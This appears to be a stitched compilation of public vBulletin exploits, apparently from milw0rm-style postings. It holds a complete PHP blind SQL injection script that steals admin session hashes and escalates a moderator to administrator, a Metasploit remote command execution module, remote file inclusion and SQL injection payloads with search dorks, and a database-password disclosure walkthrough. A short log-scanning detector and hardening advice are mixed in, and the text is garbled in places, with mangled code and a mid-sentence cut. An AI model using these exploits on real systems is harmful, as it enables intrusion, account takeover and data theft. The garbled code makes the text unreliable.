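The probe count and date-sequence are the detection signal; the User-Agent match is a bonus and trivially changed by anyone editing the source, so the rule should not depend on it. The fix on the server side is not detection at all: keep database dumps outside the document root, and deny `*.sql` at the web server (for Apache, a `<FilesMatch "\.sql$">` block with `Require all denied`) so a stray dump is never served even when the path is guessed.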
rgod/vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit

PHP code:
<?php
print_r('
-----------------------------------------------------------------------------
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
escalation by session hijacking exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

Works regardless of php.ini settings, you need a Super Moderator account
to copy posts among threads, to be launched while admin is logged in to
the control panel, this will give you full admin privileges
note: this will flood the forum with empty threads even!
-----------------------------------------------------------------------------
');

if ($argc<7) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
host:      target server (ip/hostname)
path:      path to vbulletin
user/pass: you need a moderator account
forumid:   existing forum
postid:    existing post
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
-----------------------------------------------------------------------------
');
die;
}
/*
vulnerable code in inlinemod.php near lines 185-209:

...
    case 'docopyposts':

        $vbulletin->input->clean_array_gpc('p', array(
            'postids' => TYPE_STR,
        ));

        $postids = explode(',', $vbulletin->GPC['postids']);
        foreach ($postids AS $index => $postid)
        {
            if ($postids["$index"] != intval($postid))
            {
                unset($postids["$index"]);
            }
        }

        if (empty($postids))
        {
            eval(standard_error(fetch_error('no_applicable_posts_selected')));
        }

        if (count($postids) > $postlimit)
        {
            eval(standard_error(fetch_error('you_are_limited_to_working_with_x_posts', $postlimit)));
        }
        break;
...
when an element of $postids array is not an integer, it fails to unset() the proper value.

An example:

<?php
$foo[1]="99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*";
$foo[2]=intval($foo[1]);

echo $foo[1]."\n";
echo $foo[2]."\n";
if ($foo[1] != $foo[2])
{
 echo "they are different";
}
else
{
 echo "they match!";
}
?>

output:

99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*
99999
they match!

this is because when php compares a string with an integer
it tries to convert the string to its integer value, taking the leading integer chars
of the string itself!
so unset() never runs!

the result is sql injection near lines 3792-3800:

...
    $posts = $db->query_read_slave("
        SELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid,
            thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid,
            thread.sticky, thread.open, thread.iconid
        FROM " . TABLE_PREFIX . "post AS post
        LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid)
        WHERE postid IN (" . implode(',', $postids) . ")
        ORDER BY post.dateline
    ");
...

this exploit extract various session hashes from the database
to authenticate as admin and to change the privileges of a registered user
I could not find a way to see results inside html, so this asks true/false
questions to the database, copying posts around threads

possible patch, replace:
foreach ($postids AS $index => $postid)
        {
            if ($postids["$index"] != intval($postid))
            {
                unset($postids["$index"]);
            }
        }

with:

foreach ($postids AS $index => $postid)
        {
           $postids["$index"]=(int)$postids["$index"];
        }


and, some line before:

foreach ($threadids AS $index => $threadid)
        {
            if ($threadids["$index"] != intval($threadid))
            {
                unset($threadids["$index"]);
            }
        }

with:

foreach ($threadids AS $index => $threadid)
        {
           $threadids["$index"]=(int)$threadids["$index"];
        }


vendor was contacted by email form...
*/
  
error_reporting(7);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

// Hex/ASCII dump helper (debugging aid, not used in the main flow).
function quick_dump($string)
{
  $result = ''; $exa = ''; $cont = 0;
  for ($i = 0; $i <= strlen($string) - 1; $i++)
  {
    if ((ord($string[$i]) <= 32) | (ord($string[$i]) > 126))
      { $result .= "  ."; }
    else
      { $result .= "  ".$string[$i]; }
    if (strlen(dechex(ord($string[$i]))) == 2)
      { $exa .= " ".dechex(ord($string[$i])); }
    else
      { $exa .= " 0".dechex(ord($string[$i])); }
    $cont++; if ($cont == 15) { $cont = 0; $result .= "\r\n"; $exa .= "\r\n"; }
  }
  return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

// Send one raw HTTP request (directly or through the -P proxy) and leave the response in $html.
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy == '') {
    $ock = fsockopen(gethostbyname($host), $port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex, $proxy);
    if (!$c) {
      echo 'Not a valid proxy...'; die;
    }
    $parts = explode(':', $proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock = fsockopen($parts[0], $parts[1]);
    if (!$ock) {
      echo 'No response from proxy...'; die;
    }
  }
  fputs($ock, $packet);
  if ($proxy == '') {
    $html = '';
    while (!feof($ock)) {
      $html .= fgets($ock);
    }
  }
  else {
    $html = '';
    while ((!feof($ock)) or (strpos($html, "\r\n\r\n") === false)) {
      $html .= fread($ock, 1);
    }
  }
  fclose($ock);
}

// Encode a string as a MySQL CHAR(...) expression so no quotes are needed in the injection.
function my_encode($my_string)
{
  $encoded = "CHAR(";
  for ($k = 0; $k <= strlen($my_string) - 1; $k++)
  {
    $encoded .= ord($my_string[$k]);
    if ($k == strlen($my_string) - 1) { $encoded .= ")"; }
    else { $encoded .= ","; }
  }
  return $encoded;
}

// Extract one column value character by character through the inlinemod.php boolean
// oracle: when the injected IF() yields $existing_post, the copy succeeds and the new
// thread page contains "join date". The original exploit repeated this block once per
// value (admin userid, own userid, sessionhash, password, cpsession hash); it is
// folded into one function here with identical requests.
function blind_extract($column, $table, $where, $chars)
{
  global $p, $host, $path, $forumid, $existing_post, $cookie, $html;
  $j = 1; $value = "";
  while (!strstr($value, chr(0)))
  {
    for ($i = 0; $i <= 255; $i++)
    {
      if (in_array($i, $chars))
      {
        $data  = "s=";
        $data .= "&do=docopyposts";
        $data .= "&destforumid=$forumid";
        $data .= "&title=suntzu";
        $data .= "&forumid=$forumid";
        $data .= "&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(".$column.",".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/".$table."/**/WHERE/**/".$where."/**/LIMIT/**/1/*";
        $packet  = "POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
        $packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
        $packet .= "Referer: http://".$host.$path."profile.php\r\n";
        $packet .= "Accept-Language: en\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "Content-Length: ".strlen($data)."\r\n";
        $packet .= "Pragma: no-cache\r\n";
        $packet .= "Cookie: ".$cookie."; \r\n";
        $packet .= "Connection: Close\r\n\r\n";
        $packet .= $data;
        sendpacketii($packet);
        if (stripos($html, "You have an error in your SQL syntax") !== false) { echo $html; die("\nunknown query error..."); }
        $temp   = explode("showthread.php?t=", $html);
        $temp2  = explode("\n", $temp[1]);
        $thread = (int)$temp2[0];

        $packet  = "GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
        $packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
        $packet .= "Referer: http://".$host.$path."profile.php\r\n";
        $packet .= "Accept-Language: en\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "Pragma: no-cache\r\n";
        $packet .= "Cookie: ".$cookie."; \r\n";
        $packet .= "Connection: Close\r\n\r\n";
        sendpacketii($packet);
        if (stripos($html, "join date") !== false) { $value .= chr($i); echo chr($i); sleep(1); break; }
      }
      if ($i == 255) {
        die("\nExploit failed...");
      }
    }
    $j++;
  }
  return $value;
}

$host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = md5($argv[4]);
$forumid = (int)$argv[5]; $existing_post = (int)$argv[6];
$port = 80; $proxy = "";
for ($i = 3; $i < $argc; $i++) {
  $temp = $argv[$i][0].$argv[$i][1];
  if ($temp == "-p") { $port = str_replace("-p", "", $argv[$i]); }
  if ($temp == "-P") { $proxy = str_replace("-P", "", $argv[$i]); }
}
if (($path[0] <> '/') or ($path[strlen($path) - 1] <> '/')) { echo 'Error... check the path!'; die; }
if ($proxy == '') { $p = $path; } else { $p = 'http://'.$host.':'.$port.$path; }

// Log in with the moderator account and collect the session cookies.
$data  = "vb_login_username=$user";
$data .= "&vb_login_password=";
$data .= "&s=";
$data .= "&do=login";
$data .= "&vb_login_md5password=$pass";
$data .= "&vb_login_md5password_utf=$pass";
$packet  = "POST ".$p."login.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://".$host.$path."login.php\r\n";
$packet .= "Accept-Language: en\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Pragma: no-cache\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);

$cookie = "";
$temp = explode("Set-Cookie: ", $html);
for ($i = 1; $i < count($temp); $i++)
{
  $temp2 = explode(" ", $temp[$i]);
  $cookie .= " ".trim($temp2[0]);
}
//echo "your cookie -> ".$cookie."\n\n";
if (stripos($cookie, "sessionhash") === false) { die("failed to login..."); }
// Derive the cookie prefix (normally "bb") from the cookie names that were set.
$temp = str_replace(" ", "", $cookie);
$temp = str_replace("sessionhash", "", $temp);
$temp = str_replace("lastvisit", "", $temp);
$temp = str_replace("lastactivity", "", $temp);
$temp = explode("=", $temp);
$temp = explode(";", $temp[1]);
$cookie_prefix = trim($temp[1]);
echo "cookie prefix -> ".$cookie_prefix."\n";

$chars = array();
$chars[0] = 0; //null
$chars = array_merge($chars, range(48, 57)); //numbers

echo "admin user id -> ";
$uid = blind_extract("userid", "user", "usergroupid=6", $chars);
if (trim($uid) == "") { die("\nExploit failed..."); } else { echo "\nvulnerable!"; }
$uid = intval($uid);

echo "\nyour user id -> ";
$my_uid = blind_extract("userid", "user", "username=".my_encode($user), $chars);
$my_uid = intval($my_uid);

$chars = array_merge($chars, range(97, 102)); //a-f letters
echo "\nsession hash -> ";
$sess_hash = blind_extract("sessionhash", "session", "userid=$uid", $chars);
echo "\nuser password hash -> ";
$my_hash = blind_extract("password", "user", "userid=$uid", $chars);
echo "\ncp session hash -> ";
$cpsess_hash = blind_extract("hash", "cpsession", "userid=$uid", $chars);
echo "\n";

// Open the admin user editor with the hijacked session to obtain the adminhash form token.
$packet  = "GET ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://".$host.$path."profile.php\r\n";
$packet .= "Accept-Language: en\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Pragma: no-cache\r\n";
$packet .= "Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp  = explode("adminhash\" value=\"", $html);
$temp2 = explode("\"", $temp[1]);
$adminhash = $temp2[0];
echo "adminhash ->".$adminhash."\n";
if ($adminhash <> "") { echo "\ndone! you are in... updating ".$user." rights"; }
else { die("\nexploit failed..."); }

//join to the Administrator group
$my_email = "suntzu@suntzu.com";
$data  = "do=update";
$data .= "&adminhash=$adminhash";
$data .= "&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D".$my_uid;
$data .= "&user%5Busername%5D=$user"; $data .= "&password="; $data .= "&user%5Bemail%5D=$my_email";
$data .= "&user%5Blanguageid%5D=0"; $data .= "&user%5Busertitle%5D=Admin"; $data .= "&user%5Bcustomtitle%5D=0";
$data .= "&user%5Bhomepage%5D="; $data .= "&user%5Bbirthday%5D%5Bmonth%5D=0"; $data .= "&user%5Bbirthday%5D%5Bday%5D=";
$data .= "&user%5Bbirthday%5D%5Byear%5D="; $data .= "&user%5Bshowbirthday%5D=0"; $data .= "&user%5Bsignature%5D=";
$data .= "&user%5Bicq%5D="; $data .= "&user%5Baim%5D="; $data .= "&user%5Byahoo%5D="; $data .= "&user%5Bmsn%5D="; $data .= "&user%5Bskype%5D=";
$data .= "&options%5Bcoppauser%5D=0"; $data .= "&user%5Bparentemail%5D=$my_email"; $data .= "&user%5Breferrerid%5D=";
$data .= "&user%5Bipaddress%5D="; $data .= "&user%5Bposts%5D=0";
$data .= "&userfield%5Bfield1%5D="; $data .= "&userfield%5Bfield2%5D="; $data .= "&userfield%5Bfield3%5D="; $data .= "&userfield%5Bfield4%5D=";
$data .= "&user%5Busergroupid%5D=6"; //primary usergroup, 6=Administrators
$data .= "&user%5Bdisplaygroupid%5D=-1";
$data .= "&user%5Bmembergroupids%5D%5B%5D=5"; //secondary usergroup, 5=Super Moderators
$data .= "&options%5Bshowreputation%5D=1"; $data .= "&user%5Breputation%5D=10"; $data .= "&user%5Bwarnings%5D=0";
$data .= "&user%5Binfractions%5D=0"; $data .= "&user%5Bipoints%5D=0"; $data .= "&options%5Badminemail%5D=1";
$data .= "&options%5Bshowemail%5D=0"; $data .= "&options%5Binvisible%5D=0"; $data .= "&options%5Bshowvcard%5D=0";
$data .= "&options%5Breceivepm%5D=1"; $data .= "&options%5Breceivepmbuddies%5D=0"; $data .= "&options%5Bemailonpm%5D=0";
$data .= "&user%5Bpmpopup%5D=0"; $data .= "&options%5Bshowsignatures%5D=1"; $data .= "&options%5Bshowavatars%5D=1";
$data .= "&options%5Bshowimages%5D=1"; $data .= "&user%5Bautosubscribe%5D=-1"; $data .= "&user%5Bthreadedmode%5D=0";
$data .= "&user%5Bshowvbcode%5D=1"; $data .= "&user%5Bstyleid%5D=0";
$data .= "&adminoptions%5Badminavatar%5D=0"; $data .= "&adminoptions%5Badminprofilepic%5D=0";
$data .= "&user%5Btimezoneoffset%5D=0"; $data .= "&options%5Bdstauto%5D=1"; $data .= "&options%5Bdstonoff%5D=0";
$data .= "&user%5Bdaysprune%5D=-1";
$data .= "&user%5Bjoindate%5D%5Bmonth%5D=2"; $data .= "&user%5Bjoindate%5D%5Bday%5D=26"; $data .= "&user%5Bjoindate%5D%5Byear%5D=2007";
$data .= "&user%5Bjoindate%5D%5Bhour%5D=14"; $data .= "&user%5Bjoindate%5D%5Bminute%5D=39";
$data .= "&user%5Blastactivity%5D%5Bmonth%5D=2"; $data .= "&user%5Blastactivity%5D%5Bday%5D=26"; $data .= "&user%5Blastactivity%5D%5Byear%5D=2007";
$data .= "&user%5Blastactivity%5D%5Bhour%5D=14"; $data .= "&user%5Blastactivity%5D%5Bminute%5D=58";
$data .= "&user%5Blastpost%5D%5Bmonth%5D=0"; $data .= "&user%5Blastpost%5D%5Bday%5D="; $data .= "&user%5Blastpost%5D%5Byear%5D=";
$data .= "&user%5Blastpost%5D%5Bhour%5D="; $data .= "&user%5Blastpost%5D%5Bminute%5D=";
$data .= "&userid=".$my_uid;
$data .= "&ousergroupid="; $data .= "&odisplaygroupid=0";
$data .= "&userfield%5Bfield1_set%5D=1"; $data .= "&userfield%5Bfield2_set%5D=1";
$data .= "&userfield%5Bfield3_set%5D=1"; $data .= "&userfield%5Bfield4_set%5D=1";

$packet  = "POST ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://".$host.$path."profile.php\r\n";
$packet .= "Accept-Language: en\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Pragma: no-cache\r\n";
$packet .= "Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);
  
//now give full rights to the new Administrator $data ="do=update"$data.="&adminhash=".$adminhash$data.="&adminpermissions%5Bcanadminsettings%5D=1"$data.="&adminpermissions%5Bcanadminstyles%5D=1"$data.="&adminpermissions%5Bcanadminlanguages%5D=1"$data.="&adminpermissions%5Bcanadminforums%5D=1"$data.="&adminpermissions%5Bcanadminthreads%5D=1"$data.="&adminpermissions%5Bcanadmincalendars%5D=1"$data.="&adminpermissions%5Bcanadminusers%5D=1"$data.="&adminpermissions%5Bcanadminpermissions%5D=1"$data.="&adminpermissions%5Bcanadminfaq%5D=1"$data.="&adminpermissions%5Bcanadminimages%5D=1"$data.="&adminpermissions%5Bcanadminbbcodes%5D=1"$data.="&adminpermissions%5Bcanadmincron%5D=1"$data.="&adminpermissions%5Bcanadminmaintain%5D=1"$data.="&adminpermissions%5Bcanadminplugins%5D=1"$data.="&cssprefs="$data.="&dismissednews="$data.="&userid=".$my_uid$data.="&oldpermissions=98300"$data.="&adminpermissions%5Bcanadminupgrade%5D=0"$packet ="POST ".$p."admincp/adminpermissions.php?do=update HTTP/1.0\r\n"$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"$packet.="Referer: http://".$host.$path."profile.php\r\n"$packet.="Accept-Language: en\r\n"$packet.="Content-Type: application/x-www-form-urlencoded\r\n"$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"$packet.="Host: ".$host."\r\n"$packet.="Content-Length: ".strlen($data)."\r\n"$packet.="Pragma: no-cache\r\n"$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";$packet.="Connection: Close\r\n\r\n"$packet.=$datasendpacketii($packet);
echo 
"\nnow go to http://".$host.$path."admincp/index.php and login to the control panel..."?> 
# milw0rm.com [2007-02-28]
Cold Zero/vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities

Code:
=============================================
 
vBulletin Google Site Map Creator (base) Remote File Include Vulnerability
 
=============================================
Found by : Host4vb.com & Cold z3ro
Contact : Admin@host4vb.com , Cold-z3ro@hotmail.com
Homepage : Host4vb.com , Hack-Teach.Org
=============================================
Script : http://forum.time2dine.co.nz/seo-vbulletin/vbulletin-google-site-map-3976.html
=============================================
File :
/vbgsitemap-vbseo.php  <=  Line 5
require $base."includes/functions_vbseo.php";
=============================================
File :
/vbgsitemap-config.php <= Line 139
require $base."includes/config.php";
=============================================
Exploit :
vBulletin_Forum_Path/vbgsitemap/vbgsitemap-config.php?base=Evil-Script?
vBulletin_Forum_Path/vbgsitemap/vbgsitemap-vbseo.php?base=Evil-Script?
==============================================
Greets To : Xp10.com , Hack-Teach Members , All Arabs Hosting , Sniper-sa.com , sm4host.com
Thanx: Mohandko , Alkomandoz Hacker , Mogatil , The Viper , The Wolf Ksa , Dr.Exe , Pro Hackers
Thanx: Green eyas amor , Titanichacker , hacaaar , Hack Back , Mohammad Sallah , Unix Hacker
       RoMaNcYxHaCkEr , mR wEsAm X , Mr.E-vil
Thanx: Team Hell Members (ConviCt & jEdDaWi & Black Shell & Hackers Cool & Dr.killer & Red Hat)
 
# milw0rm.com [2007-05-25]
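As an added defender-side example (not part of the advisory above and not vBulletin or plugin code), the following Python scans constructed access-log lines for the `base=` parameter this advisory describes, and also for the other include-controlling parameter names listed in the 4.1.7 Beta 1 advisory further down this page. The log lines, the documentation-range hosts and the `scan_log`/`classify` functions are this example's own assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Query parameters that advisories on this page report as flowing into
# include/require: "base" (vbgsitemap) plus the api_script / classname /
# chosenlib / classfile / filename / safeid set from the 4.1.7 Beta 1 list.
INCLUDE_PARAMS = {
    "base", "api_script", "api[classname]", "nextitem[filename]", "match[0]",
    "safeid", "file", "chosenlib", "methodinfo[classname]", "classfile",
    "filename",
}

# A value starting with one of these turns include() into a remote fetch or a
# stream-wrapper read ("php" covers php://input and php://filter).
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?|php|data|expect|phar|zip)\s*:", re.I)

# Common log format without the agent field (constructed; assumption of this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify(name, value):
    """Return a reason string if this parameter looks like an include injection, else None."""
    if name not in INCLUDE_PARAMS:
        return None
    if REMOTE_SCHEME.match(value):
        return f"remote include via {name}"
    if "../" in value or "..\\" in value or "\x00" in value:
        return f"path traversal / null byte via {name}"
    return None


def scan_log(lines):
    """Return (client ip, request target, reason) for every suspicious .php request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith(".php"):
            continue
        # parse_qsl percent-decodes once, so %00 arrives here as a real NUL byte.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify(name, value)
            if reason:
                hits.append((m.group("ip"), m.group("target"), reason))
                break
    return hits


# Constructed sample lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/May/2007:10:14:02 +0000] "GET /forum/vbgsitemap/vbgsitemap-config.php?base=http://203.0.113.9/evil.txt? HTTP/1.0" 200 512',
    '198.51.100.7 - - [25/May/2007:10:14:05 +0000] "GET /forum/showthread.php?t=1234 HTTP/1.1" 200 20480',
    '203.0.113.5 - - [25/May/2007:10:15:11 +0000] "GET /forum/api.php?api_script=ftp://203.0.113.9/x HTTP/1.0" 500 90',
    '203.0.113.5 - - [25/May/2007:10:16:40 +0000] "GET /forum/includes/functions.php?classfile=../../../../etc/passwd%00 HTTP/1.0" 200 0',
    '198.51.100.7 - - [25/May/2007:10:17:00 +0000] "GET /forum/vbgsitemap/vbgsitemap-config.php?base=./ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, target, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}  {reason}  {target}")
```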
metasploit/vBulletin misc.php Template Name Arbitrary Code Execution


Code:
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    # XXX This module needs an overhaul
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
            'Description'    => %q{
                    This module exploits an arbitrary PHP code execution flaw in
                the vBulletin web forum software. This vulnerability is only
                present when the "Add Template Name in HTML Comments" option
                is enabled. All versions of vBulletin prior to 3.0.7 are
                affected.
            },
            'Author'         =>
                [
                    'str0ke <str0ke[at]milw0rm.com>',
                    'cazz'
                ],
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 9929 $',
            'References'     =>
                [
                    [ 'CVE', '2005-0511' ],
                    [ 'BID', '12622' ],
                    [ 'OSVDB', '14047' ],
                ],
            'Privileged'     => false,
            'Platform'       => ['unix', 'solaris'],
            'Payload'        =>
                {
                    'Space'       => 512,
                    'DisableNops' => true,
                    'Keys'        => ['cmd', 'cmd_bash'],
                },
            'Targets'        => [ ['Automatic', { }], ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Feb 25 2005'
            ))
 
        register_options(
            [
                OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
            ], self.class)
 
        deregister_options(
            'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
        )
    end
 
    def go(command)
        wrapper = rand_text_alphanumeric(rand(128)+32)
 
        command = "echo #{wrapper};#{command};echo #{wrapper};"
        encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
 
        res = send_request_cgi({
                'uri'      => datastore['PATH'],
                'method'   => 'GET',
                'vars_get' =>
                    {
                        'do' => "page",
                        'template' => "{${passthru(#{encoded})}}"
                    }
            }, 5)
 
        if (res and res.body)
            b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
            if b
                return b.captures[0]
            elsif datastore['HTTP::chunked'] == true
                b = /chunked Transfer-Encoding forbidden/.match(res.body)
                if b
                    raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
                end
            end
        end
 
        return nil
    end
 
    def check
        response = go("echo ownable")
        if (!response.nil? and response =~ /ownable/sm)
            return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end
 
    def exploit
        response = go(payload.encoded)
        if response == nil
            print_error('exploit failed: no response')
        else
            if response.length == 0
                print_status('exploit successful')
            else
                print_status("Command returned #{response}")
            end
            handler
        end
    end
end
Net.Edit0r/Point Market System 3.1x vbulletin plugin SQLi Vulnerability 

Code:
#(+)Exploit Title: Point Market System 3.1x vbulletin plugin SQL Injection Vulnerability
#(+)Author   : Net.Edit0r
#(+) E-mail  : Black.hat.tm@Gmail.com
#(+) dork    : intext:Point Market System 3.1x
#(+) Version : [3.1x]
#(+) Category : Web Apps [SQl]
#(+) Platform : Tested on: linux
#(+) Download plugin : http://www.megaupload.com/?d=2R592KO0
 
____________________________________________________________________
____________________________________________________________________
 
You must register on the site!
 
The security problem is in the file "market.php". You can eliminate this
security problem by removing the plugin.
 
[~] Vulnerable File :
 
#      [+]http://localhost.com/market.php?do=cat&id=[SQL]
 
[~] SQL injection Vulnerability
     
#      [+]-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--
 
#      [+]http://localhost.com/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--
 
[~] Demo Video :
 
Video : http://www.multiupload.com/S28Z2FCZQD
 
[~] Full Info plugin Point Market
 
http://www.vbulletin.org/forum/showthread.php?p=2159503#post2159503
 
____________________________________________________________________
____________________________________________________________________
 
########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & D3adly #BHG
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ Virangar ~ S3cR3T ~ M4hd1
~ Mikili ~ P0W3RFU7 ~  Ali.Erroor and all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################
H-SK33PY/vBulletin 3.8.6 faq.php Information Disclosure 

Code:
   010101010101010101010101010101010101010101010101010101010
   0                                                       0
   1  Iranian Datacoders Security Team 2010                1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
# Original Advisory: http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded
 
# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability                  
# Date: 24/07/2010                            
# Author: H-SK33PY                     
# Software Link: http://www.vbulletin.com/
# Version: 3.8.6
# Google dork : powered by vBulletin 3.8.6
# Platform / Tested on: linux
# Category: webapplications
# Code : N/A
 
#BUG:#########################################################################
 
Perhaps this is already known to some, but I find it really interesting that a great and mighty forum software like vBulletin can make the mistake of leaving the MySQL password visible to anyone.
 
The issue was published this afternoon and vBulletin responded with a patch for it.
 
The faq.php is only indirectly affected and serves more as the entry point, because an error in the phrases is partly responsible.
 
Where are the gaps?
 
Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what we find? Ah interesting:
 
##################################################################################################
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
##################################################################################################
 
How do I use this from now?
We look for a forum that is affected by this vulnerability, click "Help" / "FAQ" at the top, enter "Database"
